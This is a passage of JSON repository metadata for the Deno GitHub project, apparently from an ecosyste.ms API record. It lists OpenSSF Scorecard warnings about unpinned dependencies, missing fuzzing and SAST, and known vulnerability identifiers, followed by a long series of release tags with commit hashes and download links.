https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden